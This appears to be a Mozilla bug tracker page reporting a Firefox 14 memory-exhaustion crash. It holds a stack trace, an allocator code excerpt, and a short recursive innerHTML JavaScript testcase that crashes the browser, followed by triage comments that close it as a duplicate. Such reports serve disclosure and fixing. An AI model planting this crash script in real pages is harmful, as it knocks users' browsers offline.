Memory Exhaustion DoS Exploit

RESOLVED DUPLICATE of bug 618234

Status

()

--
major
RESOLVED DUPLICATE of bug 618234
6 years ago
5 years ago

People

(Reporter: shashankcyberboy, Unassigned)

Tracking

(4 keywords)

Trunk
x86
Windows 7
crash, reproducible, sec-low, testcase
Points:
---

Firefox Tracking Flags

(Not tracked)

Details

Attachments

(2 attachments)

(Reporter)

Description

6 years ago
<!--

---------------------------------------------------
Mozilla Firefox 14.01 Memory Exhaustion DoS Exploit
---------------------------------------------------



Description:

Mozilla Firefox is prone to a memory exhaustion vulnerability.
The issue has been tested on Firefox 14.01, prior versions may also be affected.

mozalloc.cpp, line 184:

moz_xposix_memalign(void **ptr, size_t alignment, size_t size)
{
    int err = posix_memalign(ptr, alignment, size);
    if (UNLIKELY(err && ENOMEM == err)) {

        mozalloc_handle_oom();
        return moz_xposix_memalign(ptr, alignment, size);
    }
    // else: (0 == err) or (EINVAL == err)
    return err;
}

A crafted JavaScript leads the application to crash.

Stacktrace (Windows 7 SP1):

EAX 00000000
ECX 5D923896 MSVCR100.5D923896
EDX 00000003
EBX 7FB00000 UNICODE "xxxxxxxxx [...]"
ESP 002BB7F8
EBP 002BB85C
ESI 5D8D1EC6 MSVCR100.__p__iob
EDI 5D92379C MSVCR100.fputs
EIP 73FC1999 mozalloc.73FC1999
C 0  ES 0023 32bit 0(FFFFFFFF)
P 0  CS 001B 32bit 0(FFFFFFFF)
A 0  SS 0023 32bit 0(FFFFFFFF)
Z 0  DS 0023 32bit 0(FFFFFFFF)
S 0  FS 003B 32bit 7FFDF000(C000)
T 0  GS 0000 NULL
D 0
O 0  LastErr ERROR_NOT_ENOUGH_MEMORY (00000008)
EFL 00000202 (NO,NB,NE,A,NS,PO,GE,G)
ST0 empty 1.0000000000000000000
ST1 empty 0.1085754583206562651
ST2 empty -0.0696429635909516231
ST3 empty 86.763962149620056150
ST4 empty 31200.200000000000730
ST5 empty 1.3451474216221712500e+15
ST6 empty 1.0390856000000000000e+10
ST7 empty 0.0
               3 2 1 0      E S P U O Z D I
FST 0022  Cond 0 0 0 0  Err 0 0 1 0 0 0 1 0  (GT)
FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1

-->

<html>
<head>
<title></title>
</head>
<body></body>
<script>
function e(x)
{
  document.body.innerHTML += x;
  e(x + 'x');
};

e('x')
</script>
</html>

Comment 1

6 years ago
DoS bugs from an intentional abort on OOM do not need to remain hidden.
Group: core-security
Keywords: sec-low
(Reporter)

Comment 2

6 years ago
(In reply to Benjamin Smedberg  [:bsmedberg] from comment #1)
> DoS bugs from an intentional abort on OOM do not need to remain hidden.

ok
Component: General → General
Keywords: crash, reproducible, testcase
Product: Firefox → Core
Version: unspecified → Trunk
Created attachment 654173 [details]
Reporter's Testcase
Created attachment 654174 [details]
WinDbg Stack

Log against Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/17.0 Firefox/17.0 ID:20120821135628 (x64 Build) with javascript.options.mem.log;true.
Status: UNCONFIRMED → NEW
Component: General → HTML: Parser
Ever confirmed: true
This is a duplicate.  Please find the original and mark this a duplicate?
Whiteboard: DUPEME
I'm not sure, but maybe Bug 659333 whose Testcase uses innerHTML too?
(Reporter)

Comment 7

6 years ago
(In reply to Boris Zbarsky (:bz) [In and out Aug 1 - 10, out Aug 11-20] from comment #5)
> This is a duplicate.  Please find the original and mark this a duplicate?

sorry but itz not duplicate :/
Status: NEW → RESOLVED
Last Resolved: 6 years ago
Resolution: --- → DUPLICATE
Duplicate of bug: 618234

Updated

5 years ago
Whiteboard: DUPEME
You need to log in before you can comment on or make changes to this bug.